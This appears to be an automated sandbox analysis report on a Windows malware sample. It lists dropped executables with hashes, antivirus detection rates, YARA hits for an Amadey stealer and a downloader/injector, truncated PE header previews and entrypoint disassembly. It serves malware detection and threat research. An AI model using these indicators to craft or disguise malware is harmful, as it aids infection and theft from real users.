C:\Users\user\AppData\Local\Temp\96DF.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	322048
Entropy (8bit):	5.400444427792247
Encrypted:	false
SSDEEP:	3072:i5FHkNfL4SgCU13ZO70P2fbPbUPLcKhLI26+zs19YVnGIhX3BD:YFEV4SgF387lbPoPLFjQ7Y0
MD5:	9D63567EDC2EAD059C20C4F861E85202
SHA1:	7EAD490E571827AAEEA9104B0312E60B123C035F
SHA-256:	CF94623A92EA07C3135F349E63B9DCE7B2FB372AC3B1BE2AFA076ECFD10FB40C
SHA-512:	DFA923ACEF0CA66A20242D04E198D1DCF8DA22093B35EA08D604474AE0329793888EAA1506665B4ADB476E989CF24C12C2EF2242580F95323800DC5DEC3DAA23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L......b.................t...T.......T............@..........................`......:.......................................4u..d.... ...<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data............4...x..............@....rsrc....<... ...>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A08E.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	842752
Entropy (8bit):	7.3198316343146566
Encrypted:	false
SSDEEP:	12288:bssviUFdRP85chpYiP3yvUVqLuhwGUT+DRkelac92MIbHdGhnY/gu:bss7H85mpYw3w4ZUTOke4U2lbU9kg
MD5:	87F85379DFCEA834C8BE87CD575C5E48
SHA1:	F6FF22349057ECECD52016D287E4D47C3DE04F39
SHA-256:	88CBF406B6D238EF3F70D8E8CEFAE21000FB704763A6EC6A234598B8C5106DCD
SHA-512:	78A0C2535C0093D24E1B3A3195B3739049E79F8E6FCD1BBE0D515E10C6489479F5B44679D7EC9C0537DC336AB8A46EE79751583338C1663DD2991164FB46F1AA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L...#..b.................t...F.......T............@..........................P......?.......................................4u..d........<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data...l{.......&...x..............@....rsrc....<.......>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A41A.dll

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228800
Entropy (8bit):	7.9409505414310715
Encrypted:	false
SSDEEP:	24576:eInJtMkTBXllaAus9vOcy2HZyTSDkG7z7KmzbbIo9sz8:ekckTBXiAcc55yOQEKMIgW
MD5:	CE33E57F18A299E7552BE81D5EFC74D0
SHA1:	7FA5EC8E8854E23B8F17F5F01CF2EF9CCEC30B64
SHA-256:	AD06C861A0908DCCBEB5E360B1F8FD1E49FB8FA3FEEAE9F87E51C7FDFCA84701
SHA-512:	19E3B4E47774531A7A33F1FB88FACF5832B9A57E5389A8AB04A24F4BCACA0E877F31AD3B7D47DA070DC5443E1F2891174C27905CC510D0336029076E4731F191
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Reputation:	unknown
Preview:	MZ......................@.........................................d...........ar.....w...>.................2..............u.......2.......B`....2..............r.......Rich...............................................PE..L...'..d...........!..............................@.................................h...................................H...............h.......................x/...................................................................................text...0........................... ..`.rdata.. ...........................@..@.data...............................@....rsrc...h............p..............@..@.reloc..x:.......@..................@..B....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A8FD.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	842240
Entropy (8bit):	7.3224462781755095
Encrypted:	false
SSDEEP:	24576:k8q+mCX1XlvT/duOkWSYNK1a0v3u+3g9:k8CCFXlv8+SGKPPu+Q9
MD5:	8471A1A3950D0B7A56B8EC23F8201F97
SHA1:	EA0A430709F43D3395C5AA581B9F52919A195CFC
SHA-256:	540A56DD60D8EE5EA9091EDAF421D8C4AB950AF9A85001D0B70508505D739BD5
SHA-512:	D1EF86623816AF755DB64AB6FA68DDC1A6C94EF9942BC8A67601C2B45AFAB92210C52A334EE3E6E79F461238FD6F90BB137E9E37BB9ED25466A299DCDF16501E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+m.hE>.hE>.hE>...>.hE>...>.hE>...>.hE>...>.hE>.hD>shE>...>.hE>...>.hE>...>.hE>Rich.hE>........PE..L...bg.c.................r...F.......U............@..........................P......9`......................................4u..P........;...........................................................5..@............................................text...Dq.......r.................. ..`.data...l\|.......(...v..............@....rsrc....;.......<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B225.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	640000
Entropy (8bit):	7.002125729277384
Encrypted:	false
SSDEEP:	12288:IBhwg/mbT0VTeU46siC7s1lC+dx7iA+P5zs:IBhXsT0VH43dw1lC+joK
MD5:	929E2722CFF5264D8865B1A1D57DFE01
SHA1:	7F7570E24A213A26C7CC5AAD6418EF248A8AD5CD
SHA-256:	E3B71AB6F5A7BF91D2BDBF7D9814C2AB44AB57EFDA1835A81F1072D8911EDD9C
SHA-512:	826EF8D16F9A6ED1985FB8F355282ABDB30CCD9B147B8AAF08C31A808AE8220315AC3A755E92099D8EB825C711D8425860D63E7B998F9C8A3916F247DEE77BB8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L...;v.a.................t...........T............@..........................@.......,......................................4u..d........<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data...Lc...........x..............@....rsrc....<.......>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C428.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	842752
Entropy (8bit):	7.3198316343146566
Encrypted:	false
SSDEEP:	12288:bssviUFdRP85chpYiP3yvUVqLuhwGUT+DRkelac92MIbHdGhnY/gu:bss7H85mpYw3w4ZUTOke4U2lbU9kg
MD5:	87F85379DFCEA834C8BE87CD575C5E48
SHA1:	F6FF22349057ECECD52016D287E4D47C3DE04F39
SHA-256:	88CBF406B6D238EF3F70D8E8CEFAE21000FB704763A6EC6A234598B8C5106DCD
SHA-512:	78A0C2535C0093D24E1B3A3195B3739049E79F8E6FCD1BBE0D515E10C6489479F5B44679D7EC9C0537DC336AB8A46EE79751583338C1663DD2991164FB46F1AA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L...#..b.................t...F.......T............@..........................P......?.......................................4u..d........<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data...l{.......&...x..............@....rsrc....<.......>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C474.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	842752
Entropy (8bit):	7.3198316343146566
Encrypted:	false
SSDEEP:	12288:bssviUFdRP85chpYiP3yvUVqLuhwGUT+DRkelac92MIbHdGhnY/gu:bss7H85mpYw3w4ZUTOke4U2lbU9kg
MD5:	87F85379DFCEA834C8BE87CD575C5E48
SHA1:	F6FF22349057ECECD52016D287E4D47C3DE04F39
SHA-256:	88CBF406B6D238EF3F70D8E8CEFAE21000FB704763A6EC6A234598B8C5106DCD
SHA-512:	78A0C2535C0093D24E1B3A3195B3739049E79F8E6FCD1BBE0D515E10C6489479F5B44679D7EC9C0537DC336AB8A46EE79751583338C1663DD2991164FB46F1AA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L...#..b.................t...F.......T............@..........................P......?.......................................4u..d........<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data...l{.......&...x..............@....rsrc....<.......>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C523.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	321536
Entropy (8bit):	5.3945352886578055
Encrypted:	false
SSDEEP:	3072:S5FZk7Nf4AyEK5zNeOP2ft+4y5dAs+mPmNLHiAGnPh6o4qnBD:IFm94AyJzUDQl5OrleJ6
MD5:	C8AB8F9FBA1C5769E9DC9FB763E0AD91
SHA1:	84A54F6837178AAF781E942456BC73C6E3EC35F3
SHA-256:	285C80CEAE1DDD19AEF2FB360C680C69C15D7A8D8DC0774FC26D59668F2230FF
SHA-512:	D9C876F747653D35E71770C029CF8DD52EC2AE4AF28814DFB6773875A4109CB0E90DD6C0B25A03CFB4954F32879D7D6508853FC0A5CBC6FE4E08ACD95F702FA2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L...T..c.................t...R.......T............@..........................`......v.......................................4u..d.... ...<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data............2...x..............@....rsrc....<... ...>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E640.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	842752
Entropy (8bit):	7.3198316343146566
Encrypted:	false
SSDEEP:	12288:bssviUFdRP85chpYiP3yvUVqLuhwGUT+DRkelac92MIbHdGhnY/gu:bss7H85mpYw3w4ZUTOke4U2lbU9kg
MD5:	87F85379DFCEA834C8BE87CD575C5E48
SHA1:	F6FF22349057ECECD52016D287E4D47C3DE04F39
SHA-256:	88CBF406B6D238EF3F70D8E8CEFAE21000FB704763A6EC6A234598B8C5106DCD
SHA-512:	78A0C2535C0093D24E1B3A3195B3739049E79F8E6FCD1BBE0D515E10C6489479F5B44679D7EC9C0537DC336AB8A46EE79751583338C1663DD2991164FB46F1AA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L...#..b.................t...F.......T............@..........................P......?.......................................4u..d........<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data...l{.......&...x..............@....rsrc....<.......>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FE5F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4351488
Entropy (8bit):	7.915186518394389
Encrypted:	false
SSDEEP:	98304:KykuFqMHmGlYVlFPKGszK006t9jZETDaAOY23rPWLaPjbus:KyhFr2Psm0NZEvaAOYerPWej
MD5:	26115AFB115A50A1CBBC4A4DE8C6816D
SHA1:	A77F16B4FA96CCDA3AD9C9FEBBECDD76039E47BE
SHA-256:	965B882B4D565124645E8412C492933E4421BB3AAC2C22C6BA54E3E01F5C2692
SHA-512:	ECE791BE7FC1C94DC53FAC5C96C97E87CE46913B431A983DC5F3F3E58264847B46AEDD099A542589B8B2B242FFEC81EB67D0B6DC4F4341268C82F737C360F806
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\FE5F.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x.d.................\B..........zB.. ....B...@.. ........................B...........@.................................PzB.K.....B.......................B...................................................... ............... ..H............text....ZB.. ...\B................. ..`.rsrc.........B......^B.............@..@.reloc........B......dB.............@..B.................zB.....H........dB.\............'...=B..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

C:\Users\user\AppData\Local\Temp\XandETC.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\FE5F.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	3890176
Entropy (8bit):	7.902408557753204
Encrypted:	false
SSDEEP:	49152:8Pu803iSM2N7aUjjqpEbUS2qv5MQBsSY/b7KoiTFUgxylC42lVJpiU71PP:s12BEE4vqxMQzub7OTFUgxylqTiU7J
MD5:	3006B49F3A30A80BB85074C279ACC7DF
SHA1:	728A7A867D13AD0034C29283939D94F0DF6C19DF
SHA-256:	F283B4C0AD4A902E1CB64201742CA4C5118F275E7B911A7DAFDA1EF01B825280
SHA-512:	E8FC5791892D7F08AF5A33462A11D39D29B5E86A62CBF135B12E71F2FCAAA48D40D5E3238F64E17A2F126BCFB9D70553A02D30DC60A89F1089B2C1E7465105DD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Bu.c...............&.....X;................@..............................;.....!.;...`... ...............................................8.......9.......8...............;...............................8.(...................D.8..............................text...............................`..`.data.....7.......7.................@....rdata........8.......8.............@..@.pdata........8.......8.............@..@.xdata........8.......8.............@..@.bss....8.....8..........................idata........8.......8.............@....CRT....h.....8.......8.............@....tls..........9.......8.............@....rsrc.........9.......8.............@....reloc........;......Z;.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aafg31.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\FE5F.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	247808
Entropy (8bit):	6.802694838069394
Encrypted:	false
SSDEEP:	6144:dakwQKCJRGHUlBWmyYiEEiEEsfByAwZZS4onQF:ddQCJRwUlXyYXIB7GjF
MD5:	179AF079BC710BD2D1EE6DC5B8A0205C
SHA1:	62B08269ACCD6C12FB358EC8F8AE2793E4F8E325
SHA-256:	B9E5BB30A36587F424336FC28002C920DB6A13379D7F27361DAE7B58F533C079
SHA-512:	4D9A9B1DD96FA1589B2F5B2C3F2A3CB972EE522C6559E8C96642ACE083A61CA9EA64FE77B4BC882B58C25252D0087A0198E2E469F98DE7FFC423E82F35C9CA76
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C..".".".Zx..".Zi..".Z~.."."..#.Zn..".Zg.."...".Zy..".Z\|..".Rich.".........PE..d...r.[J.........."......D..........................................................d.....@.......... .......................................;...........Y..............................................................................P............................text....B.......D.................. ..`.data...h....`.......H..............@....pdata...............P..............@..@.rsrc....`.......Z...f..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\oldplayer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\FE5F.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	202752
Entropy (8bit):	6.344899274055935
Encrypted:	false
SSDEEP:	3072:lWgR9+o+G2K47yLk6E9EzwHxFTTDYUSNt2kLu5gf7or7wy+wXRcWfnPjt:lWu+5a4ukZSwH/TT2NE4u5gTovv
MD5:	A64A886A695ED5FB9273E73241FEC2F7
SHA1:	363244CA05027C5BEB938562DF5B525A2428B405
SHA-256:	563ACABE49CC451E9CAAC20FAE780BAD27EA09AAEFAAF8A1DFD838A00DE97144
SHA-512:	122779AD7BCE927E1B881DF181FCC3181080D3929A67F750358FA446A21397B998D167C03AED5F3BDC3CD7A1F17E4DA095F9B4A9367C6357CABEFCF8CDD29474
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 89%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L....+.d.................Z..........o;.......p....@..........................`............@.....................................d.... .......................0..p ..`...p...................t...........@............p...............................text....Y.......Z.................. ..`.rdata..t\|...p...~...^..............@..@.data...h$..........................@....rsrc........ ......................@..@.reloc..p ...0..."..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\5274.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	842240
Entropy (8bit):	7.3224462781755095
Encrypted:	false
SSDEEP:	24576:k8q+mCX1XlvT/duOkWSYNK1a0v3u+3g9:k8CCFXlv8+SGKPPu+Q9
MD5:	8471A1A3950D0B7A56B8EC23F8201F97
SHA1:	EA0A430709F43D3395C5AA581B9F52919A195CFC
SHA-256:	540A56DD60D8EE5EA9091EDAF421D8C4AB950AF9A85001D0B70508505D739BD5
SHA-512:	D1EF86623816AF755DB64AB6FA68DDC1A6C94EF9942BC8A67601C2B45AFAB92210C52A334EE3E6E79F461238FD6F90BB137E9E37BB9ED25466A299DCDF16501E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+m.hE>.hE>.hE>...>.hE>...>.hE>...>.hE>...>.hE>.hD>shE>...>.hE>...>.hE>...>.hE>Rich.hE>........PE..L...bg.c.................r...F.......U............@..........................P......9`......................................4u..P........;...........................................................5..@............................................text...Dq.......r.................. ..`.data...l\|.......(...v..............@....rsrc....;.......<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fvuiwjh

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	322048
Entropy (8bit):	5.400444427792247
Encrypted:	false
SSDEEP:	3072:i5FHkNfL4SgCU13ZO70P2fbPbUPLcKhLI26+zs19YVnGIhX3BD:YFEV4SgF387lbPoPLFjQ7Y0
MD5:	9D63567EDC2EAD059C20C4F861E85202
SHA1:	7EAD490E571827AAEEA9104B0312E60B123C035F
SHA-256:	CF94623A92EA07C3135F349E63B9DCE7B2FB372AC3B1BE2AFA076ECFD10FB40C
SHA-512:	DFA923ACEF0CA66A20242D04E198D1DCF8DA22093B35EA08D604474AE0329793888EAA1506665B4ADB476E989CF24C12C2EF2242580F95323800DC5DEC3DAA23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L......b.................t...T.......T............@..........................`......:.......................................4u..d.... ...<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data............4...x..............@....rsrc....<... ...>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rfuiwjh

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	322560
Entropy (8bit):	5.405603854545065
Encrypted:	false
SSDEEP:	3072:P5FHkfW34USoupHoCP1P2fpBm6SVkdp5o5MMviwGG/HOp5QOYCBD:RFE+4UShH/PAMT5MM6wGIOp5z
MD5:	B44C8FB3583E3E3C9324A535E356A8D0
SHA1:	846537ACC6E4D12C1E6DEE35E6725ADEBD852E10
SHA-256:	000516C28C42ECFAE446BE04B493A3110B5FC044DE5BF89E4D6FBDA5D2C2EE84
SHA-512:	5BD467933118DA44CF8D18AA9C0943DDE4C355926AB3DA91942D5A122C1BB16E3FAD467F7CAFEF3731E51DB0DCB2A142190C08A91B699E4566DDB955DDD0BD95
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L.....^c.................t...V.......T............@..........................`..............................................4u..d.... ...<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data...L........6...x..............@....rsrc....<... ...>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rfuiwjh:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Reputation:	unknown
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.405603854545065
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	322'560 bytes
MD5:	b44c8fb3583e3e3c9324a535e356a8d0
SHA1:	846537acc6e4d12c1e6dee35e6725adebd852e10
SHA256:	000516c28c42ecfae446be04b493a3110b5fc044de5bf89e4d6fbda5d2c2ee84
SHA512:	5bd467933118da44cf8d18aa9c0943dde4c355926ab3da91942d5a122c1bb16e3fad467f7cafef3731e51db0dcb2a142190c08a91b699e4566ddb955ddd0bd95
SSDEEP:	3072:P5FHkfW34USoupHoCP1P2fpBm6SVkdp5o5MMviwGG/HOp5QOYCBD:RFE+4UShH/PAMT5MM6wGIOp5z
TLSH:	C8644C135291FC65F5264B329E2EC2E8771EF9928F19779622186E2F04B31B2C373716
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L.....^c.................t.

File Icon


Icon Hash:	c73708c0a0222d02

Static PE Info

General

Entrypoint:	0x4054f3
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x635E7F87 [Sun Oct 30 13:43:35 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	4d78eb5f7b59a8e753748eb85e3f3b28

Entrypoint Preview

Instruction
call 00007F71111C3A02h
jmp 00007F71111BF9BEh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, dword ptr fs:[00000000h]
mov dword ptr [ebp-04h], esi
mov dword ptr [ebp-08h], 00405561h
push 00000000h
push dword ptr [ebp+0Ch]
push dword ptr [ebp-08h]
push dword ptr [ebp+08h]
call 00007F71111C8CBCh
mov eax, dword ptr [ebp+0Ch]
mov eax, dword ptr [eax+04h]
and eax, FFFFFFFDh
mov ecx, dword ptr [ebp+0Ch]
mov dword ptr [ecx+04h], eax
mov edi, dword ptr fs:[00000000h]
mov ebx, dword ptr [ebp-04h]
mov dword ptr [ebx], edi
mov dword ptr fs:[00000000h], ebx
pop edi
pop esi
pop ebx
leave
retn 0008h
push ebp
mov ebp, esp
sub esp, 08h
push ebx
push esi
push edi
cld
mov dword ptr [ebp-04h], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-04h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F71111C45DCh
add esp, 20h
mov dword ptr [ebp-08h], eax
pop edi
pop esi
pop ebx
mov eax, dword ptr [ebp+00h]

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[C++] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x27534	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1ee2000	0x13ce0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3578	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x234	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27228	0x27400	False	0.2812002388535032	data	3.9341662373986592	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x29000	0x1eb8b4c	0x13600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
